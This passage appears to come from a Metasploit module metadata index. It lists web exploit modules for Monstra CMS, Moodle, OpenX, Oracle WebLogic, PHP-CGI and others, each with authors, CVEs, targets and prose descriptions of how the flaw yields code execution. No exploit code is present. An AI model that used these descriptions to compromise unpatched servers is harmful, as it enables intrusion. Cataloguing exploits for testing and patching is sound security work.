"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/mobilecartly_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mobilecartly_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/monstra_fileupload_exec": {
"name": "Monstra CMS Authenticated Arbitrary File Upload",
"full_name": "exploit/multi/http/monstra_fileupload_exec",
"rank": 600,
"disclosure_date": "2017-12-18",
"type": "exploit",
"author": [
"Ishaq Mohammed <shaikhishaq201@gmail.com>",
"Touhid M.Shaikh <touhidshaikh22@gmail.com>"
],
"description": "MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to remote command execution on the remote server.\n An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.\n This module was tested against MonstraCMS 3.0.4.",
"references": [
"CVE-2017-18048",
"EDB-43348",
"URL-https://blogs.securiteam.com/index.php/archives/3559",
"URL-https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1",
"URL-https://www.youtube.com/watch?v=-ziZ6DELbzw"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Monstra CMS 3.0.4"
],
"mod_time": "2018-07-10 14:13:57 +0000",
"path": "/modules/exploits/multi/http/monstra_fileupload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/monstra_fileupload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/moodle_cmd_exec": {
"name": "Moodle Remote Command Execution",
"full_name": "exploit/multi/http/moodle_cmd_exec",
"rank": 400,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Moodle allows an authenticated user to define spellcheck settings via the web interface.\n The user can update the spellcheck mechanism to point to a system-installed aspell binary.\n By updating the path for the spellchecker to an arbitrary command, an attacker can run\n arbitrary commands in the context of the web application upon spellchecking requests.\n\n This module also allows an attacker to leverage another privilege escalation vuln.\n Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey\n and use this to escalate privileges to that of an admin, allowing the module to pop a shell\n as a previously unprivileged authenticated user.\n\n This module was tested against Moodle version 2.5.2 and 2.2.3.",
"references": [
"CVE-2013-3630",
"EDB-28174",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/moodle_cmd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/movabletype_upgrade_exec": {
"name": "Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",
"full_name": "exploit/multi/http/movabletype_upgrade_exec",
"rank": 600,
"disclosure_date": "2013-01-07",
"type": "exploit",
"author": [
"Kacper Nowak",
"Nick Blundell",
"Gary O'Leary-Steele"
],
"description": "This module can be used to execute a payload on MoveableType (MT) that\n exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),\n that is used during installation and updating of the platform.\n The vulnerability arises due to the following properties:\n 1. This script may be invoked remotely without requiring authentication\n to any MT instance.\n 2. Through a crafted POST request, it is possible to invoke particular\n database migration functions (i.e. functions that bring the existing\n database up-to-date with an updated codebase) by name and with\n particular parameters.\n 3. A particular migration function, core_drop_meta_for_table, allows\n a class parameter to be set which is used directly in a perl eval\n statement, allowing perl code injection.",
"references": [
"CVE-2012-6315",
"CVE-2013-0209",
"OSVDB-89322",
"URL-http://www.sec-1.com/blog/?p=402",
"URL-http://www.movabletype.org/2013/01/movable_type_438_patch.html"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Movable Type 4.2x, 4.3x"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/movabletype_upgrade_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/movabletype_upgrade_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mutiny_subnetmask_exec": {
"name": "Mutiny Remote Command Execution",
"full_name": "exploit/multi/http/mutiny_subnetmask_exec",
"rank": 600,
"disclosure_date": "2012-10-22",
"type": "exploit",
"author": [
"Christopher Campbell",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authenticated command injection vulnerability in the\n Mutiny appliance. Versions prior to 4.5-1.12 are vulnerable. In order to exploit\n the vulnerability the mutiny user must have access to the admin interface. The\n injected commands are executed with root privileges. This module has been tested\n successfully on Mutiny 4.2-1.05.",
"references": [
"CVE-2012-3001",
"OSVDB-86570",
"BID-56165",
"US-CERT-VU-841851",
"URL-http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix CMD",
"Linux Payload"
],
"mod_time": "2018-12-11 10:16:16 +0000",
"path": "/modules/exploits/multi/http/mutiny_subnetmask_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mutiny_subnetmask_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/nas4free_php_exec": {
"name": "NAS4Free Arbitrary Remote Code Execution",
"full_name": "exploit/multi/http/nas4free_php_exec",
"rank": 500,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have\n the code executed remotely. This module was successfully tested against NAS4Free version\n 9.1.0.1.804. Earlier builds are likely to be vulnerable as well.",
"references": [
"CVE-2013-3631",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/nas4free_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/nas4free_php_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/navigate_cms_rce": {
"name": "Navigate CMS Unauthenticated Remote Code Execution",
"full_name": "exploit/multi/http/navigate_cms_rce",
"rank": 600,
"disclosure_date": "2018-09-26",
"type": "exploit",
"author": [
"Pyriphlegethon"
],
"description": "This module exploits insufficient sanitization in the database::protect\n method, of Navigate CMS versions 2.8 and prior, to bypass authentication.\n\n The module then uses a path traversal vulnerability in navigate_upload.php\n that allows authenticated users to upload PHP files to arbitrary locations.\n Together these vulnerabilities allow an unauthenticated attacker to\n execute arbitrary PHP code remotely.\n\n This module was tested against Navigate CMS 2.8.",
"references": [
"CVE-2018-17552",
"CVE-2018-17553"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-02 06:57:04 +0000",
"path": "/modules/exploits/multi/http/navigate_cms_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/navigate_cms_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/netwin_surgeftp_exec": {
"name": "Netwin SurgeFTP Remote Command Execution",
"full_name": "exploit/multi/http/netwin_surgeftp_exec",
"rank": 400,
"disclosure_date": "2012-12-06",
"type": "exploit",
"author": [
"Spencer McIntyre",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8\n or prior. In order to execute commands via the FTP service, please note that\n you must have a valid credential to the web-based administrative console.",
"references": [
"OSVDB-89105",
"EDB-23522"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 7021,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Unix"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/http/netwin_surgeftp_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/netwin_surgeftp_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/nibbleblog_file_upload": {
"name": "Nibbleblog File Upload Vulnerability",
"full_name": "exploit/multi/http/nibbleblog_file_upload",
"rank": 600,
"disclosure_date": "2015-09-01",
"type": "exploit",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "Nibbleblog contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. This module was\n tested on version 4.0.3.",
"references": [
"CVE-2015-6967",
"URL-http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Nibbleblog 4.0.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/nibbleblog_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/nibbleblog_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/novell_servicedesk_rce": {
"name": "Novell ServiceDesk Authenticated File Upload",
"full_name": "exploit/multi/http/novell_servicedesk_rce",
"rank": 600,
"disclosure_date": "2016-03-30",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an authenticated arbitrary file upload via directory traversal\n to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in\n Windows and Linux installations of Novell ServiceDesk, as well as the Virtual\n Appliance provided by Novell.",
"references": [
"CVE-2016-1593",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt",
"URL-https://seclists.org/bugtraq/2016/Apr/64"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Novell ServiceDesk / Linux",
"Novell ServiceDesk / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/novell_servicedesk_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/novell_servicedesk_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/nuuo_nvrmini_upgrade_rce": {
"name": "NUUO NVRmini upgrade_handle.php Remote Command Execution",
"full_name": "exploit/multi/http/nuuo_nvrmini_upgrade_rce",
"rank": 600,
"disclosure_date": "2018-08-04",
"type": "exploit",
"author": [
"Berk Dusunur",
"numan turle"
],
"description": "This exploits a vulnerability in the web application of NUUO NVRmini IP camera,\n which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.",
"references": [
"URL-https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html",
"URL-https://www.tenable.com/security/research/tra-2018-41",
"CVE-2018-14933",
"EDB-45070"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NUUO NVRmini"
],
"mod_time": "2019-02-06 22:26:31 +0000",
"path": "/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/nuuo_nvrmini_upgrade_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/op5_license": {
"name": "OP5 license.php Remote Command Execution",
"full_name": "exploit/multi/http/op5_license",
"rank": 600,
"disclosure_date": "2012-01-05",
"type": "exploit",
"author": [
"Peter Osterberg <j@vel.nu>"
],
"description": "This module exploits an arbitrary root command execution vulnerability in the\n OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,\n 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.",
"references": [
"CVE-2012-0261",
"OSVDB-78064",
"URL-http://secunia.com/advisories/47417/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/op5_license.rb",
"is_install_path": true,
"ref_name": "multi/http/op5_license",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/op5_welcome": {
"name": "OP5 welcome Remote Command Execution",
"full_name": "exploit/multi/http/op5_welcome",
"rank": 600,
"disclosure_date": "2012-01-05",
"type": "exploit",
"author": [
"Peter Osterberg <j@vel.nu>"
],
"description": "This module exploits an arbitrary root command execution vulnerability in\n OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5,\n 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.",
"references": [
"CVE-2012-0262",
"OSVDB-78065",
"URL-http://secunia.com/advisories/47417/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/op5_welcome.rb",
"is_install_path": true,
"ref_name": "multi/http/op5_welcome",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/openfire_auth_bypass": {
"name": "Openfire Admin Console Authentication Bypass",
"full_name": "exploit/multi/http/openfire_auth_bypass",
"rank": 600,
"disclosure_date": "2008-11-10",
"type": "exploit",
"author": [
"Andreas Kurtz",
"h0ng10"
],
"description": "This module exploits an authentication bypass vulnerability in the administration\n console of Openfire servers. By using this vulnerability it is possible to\n upload/execute a malicious Openfire plugin on the server and execute arbitrary Java\n code. This module has been tested against Openfire 3.6.0a.\n\n It is possible to remove the uploaded plugin after execution, however this might turn\n the server in some kind of unstable state, making re-exploitation difficult. You might\n want to do this manually.",
"references": [
"CVE-2008-6508",
"OSVDB-49663",
"BID-32189",
"EDB-7075",
"URL-http://community.igniterealtime.org/thread/35874"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/openfire_auth_bypass.rb",
"is_install_path": true,
"ref_name": "multi/http/openfire_auth_bypass",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/openmediavault_cmd_exec": {
"name": "OpenMediaVault Cron Remote Command Execution",
"full_name": "exploit/multi/http/openmediavault_cmd_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
"references": [
"CVE-2013-3632",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/openmediavault_cmd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/openx_backdoor_php": {
"name": "OpenX Backdoor PHP Code Execution",
"full_name": "exploit/multi/http/openx_backdoor_php",
"rank": 600,
"disclosure_date": "2013-08-07",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>",
"Unknown"
],
"description": "OpenX Ad Server version 2.8.10 was shipped with an obfuscated\n backdoor since at least November 2012 through August 2013.\n Exploitation is simple, requiring only a single request with a\n rot13'd and reversed payload.",
"references": [
"CVE-2013-4211",
"OSVDB-96073",
"URL-http://www.heise.de/security/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html",
"URL-http://forum.openx.org/index.php?showtopic=503521628"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/openx_backdoor_php.rb",
"is_install_path": true,
"ref_name": "multi/http/openx_backdoor_php",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/opmanager_socialit_file_upload": {
"name": "ManageEngine OpManager and Social IT Arbitrary File Upload",
"full_name": "exploit/multi/http/opmanager_socialit_file_upload",
"rank": 600,
"disclosure_date": "2014-09-27",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\n The vulnerability exists in the FileCollector servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\n version 11.0 of SocialIT for Windows and Linux.",
"references": [
"CVE-2014-6034",
"OSVDB-112276",
"URL-https://seclists.org/fulldisclosure/2014/Sep/110"
],
"platform": "Java",
"arch": "java",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/opmanager_socialit_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/opmanager_socialit_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/oracle_ats_file_upload": {
"name": "Oracle ATS Arbitrary File Upload",
"full_name": "exploit/multi/http/oracle_ats_file_upload",
"rank": 600,
"disclosure_date": "2016-01-20",
"type": "exploit",
"author": [
"Zhou Yu",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an authentication bypass and arbitrary file upload\n in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and\n unknown earlier versions, to upload and execute a JSP shell.",
"references": [
"CVE-2016-0492",
"CVE-2016-0491",
"EDB-39691"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8088,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OATS <= 12.4.0.2.0 (Windows)",
"OATS <= 12.4.0.2.0 (Linux)"
],
"mod_time": "2019-02-25 11:35:34 +0000",
"path": "/modules/exploits/multi/http/oracle_ats_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/oracle_ats_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/oracle_reports_rce": {
"name": "Oracle Forms and Reports Remote Code Execution",
"full_name": "exploit/multi/http/oracle_reports_rce",
"rank": 500,
"disclosure_date": "2014-01-15",
"type": "exploit",
"author": [
"miss_sudo <security@netinfiltration.com>",
"Mekanismen <mattias@gotroot.eu>"
],
"description": "This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution\n on the host. The showenv url can be used to disclose information about a server. A second\n vulnerability that allows arbitrary reading and writing to the host filesystem can then be\n used to write a shell from a remote url to a known local path disclosed from the previous\n vulnerability.\n\n The local path being accessible from an URL allows an attacker to perform the remote code\n execution using, for example, a .jsp shell.\n\n This module was tested successfully on Windows and Oracle Forms and Reports 10.1.",
"references": [
"CVE-2012-3152",
"CVE-2012-3153",
"OSVDB-86395",
"OSVDB-86394",
"EDB-31253"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/oracle_reports_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/oracle_reports_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/oracle_weblogic_wsat_deserialization_rce": {
"name": "Oracle WebLogic wls-wsat Component Deserialization RCE",
"full_name": "exploit/multi/http/oracle_weblogic_wsat_deserialization_rce",
"rank": 600,
"disclosure_date": "2017-10-19",
"type": "exploit",
"author": [
"Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>",
"Luffin",
"Alexey Tyurin",
"Federico Dotta"
],
"description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.",
"references": [
"URL-https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html",
"URL-https://github.com/Luffin/CVE-2017-10271",
"URL-https://github.com/kkirsche/CVE-2017-10271",
"CVE-2017-10271",
"EDB-43458"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 7001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Command payload",
"Unix Command payload"
],
"mod_time": "2018-01-18 13:26:44 +0000",
"path": "/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/oracle_weblogic_wsat_deserialization_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/orientdb_exec": {
"name": "OrientDB 2.2.x Remote Code Execution",
"full_name": "exploit/multi/http/orientdb_exec",
"rank": 400,
"disclosure_date": "2017-07-13",
"type": "exploit",
"author": [
"Francis Alexander - Beyond Security's SecuriTeam Secure Disclosure program",
"Ricardo Jorge Borges de Almeida ricardojba1 <Ricardo Jorge Borges de Almeida ricardojba1@gmail.com>"
],
"description": "This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.\n All versions from 2.2.2 up to 2.2.22 should be vulnerable.",
"references": [
"CVE-2017-11467",
"URL-https://blogs.securiteam.com/index.php/archives/3318",
"URL-http://www.palada.net/index.php/2017/07/13/news-2112/",
"URL-https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 2480,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Unix CMD",
"Windows"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/orientdb_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/orientdb_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/oscommerce_installer_unauth_code_exec": {
"name": "osCommerce Installer Unauthenticated Code Execution",
"full_name": "exploit/multi/http/oscommerce_installer_unauth_code_exec",
"rank": 600,
"disclosure_date": "2018-04-30",
"type": "exploit",
"author": [
"Simon Scannell",
"Daniel Teixeira"
],
"description": "If the /install/ directory was not removed, it is possible for an unauthenticated\n attacker to run the \"install_4.php\" script, which will create the configuration\n file for the installation. This allows the attacker to inject PHP code into the\n configuration file and execute it.",
"references": [
"EDB-44374"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"osCommerce 2.3.4.1"
],
"mod_time": "2018-06-26 08:21:10 +0000",
"path": "/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/oscommerce_installer_unauth_code_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/pandora_upload_exec": {
"name": "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/pandora_upload_exec",
"rank": 600,
"disclosure_date": "2010-11-30",
"type": "exploit",
"author": [
"Juan Galiana Lara",
"Raymond Nunez <rcnunez@upd.edu.ph>",
"Elizabeth Loyola <ecloyola@upd.edu.ph>",
"Fr330wn4g3 <Fr330wn4g3@gmail.com>",
"_flood <freshbones@gmail.com>",
"mubix <mubix@room362.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\n upload which allows a user to upload arbitrary files to the '/images/' directory.\n\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\n that was facilitated by egypt and mubix.",
"references": [
"CVE-2010-4279",
"OSVDB-69549",
"BID-45112"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/pandora_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/pandora_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phoenix_exec": {
"name": "Phoenix Exploit Kit Remote Code Execution",
"full_name": "exploit/multi/http/phoenix_exec",
"rank": 600,
"disclosure_date": "2016-07-01",
"type": "exploit",
"author": [
"CrashBandicot",
"Jay Turla"
],
"description": "This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The\n Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the\n presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,\n silently installing malware if found.",
"references": [
"EDB-40047",
"URL-http://krebsonsecurity.com/tag/phoenix-exploit-kit/",
"URL-https://www.pwnmalw.re/Exploit%20Pack/phoenix"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phoenix_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phoenix_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/php_cgi_arg_injection": {
"name": "PHP CGI Argument Injection",
"full_name": "exploit/multi/http/php_cgi_arg_injection",
"rank": 600,
"disclosure_date": "2012-05-03",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>",
"hdm <x@hdm.io>",
"jjarmoc",
"kingcope",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n an argument injection vulnerability. This module takes advantage of\n the -d flag to set php.ini directives to achieve code execution.\n From the advisory: \"if there is NO unescaped '=' in the query string,\n the string is split on '+' (encoded space) characters, urldecoded,\n passed to a function that escapes shell metacharacters (the \"encoded in\n a system-defined manner\" from the RFC) and then passes them to the CGI\n binary.\" This module can also be used to exploit the plesk 0day disclosed\n by kingcope and exploited in the wild on June 2013.",
"references": [
"CVE-2012-1823",
"OSVDB-81633",
"OSVDB-93979",
"EDB-25986",
"URL-http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/",
"URL-http://kb.parallels.com/en/116241"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/php_cgi_arg_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/php_cgi_arg_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/php_utility_belt_rce": {
"name": "PHP Utility Belt Remote Code Execution",
"full_name": "exploit/multi/http/php_utility_belt_rce",
"rank": 600,
